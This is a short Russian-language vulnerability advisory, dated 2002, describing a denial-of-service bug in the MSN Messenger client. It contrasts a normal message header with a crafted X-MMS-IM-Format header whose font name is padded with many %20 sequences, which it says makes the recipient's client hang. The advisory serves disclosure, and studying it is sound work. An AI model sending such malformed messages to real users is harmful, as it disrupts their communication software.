Security Lab

DoS против Msn Messenger

Дата публикации:08.05.2002
Всего просмотров:950
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Msn Messenger - популярный интернет пейджер от Microsoft. Клиент зависает при получении некорректного описания шрифта в заголовке мгновенного сообщения.

Клиент Msn Messenger посылает заголовок с каждым сообщением. Заголовок содержит информацию о шрифте, цвете сообщения и т.п.

Обычно заголовок выглядит следующим образом:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>


Теперь создаем заголовок с длинным именем шрифта:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>


Это сообщение вызовет зависания клиента Msn Messenger
 

Ссылки: Misformated message header causes msn messenger to crash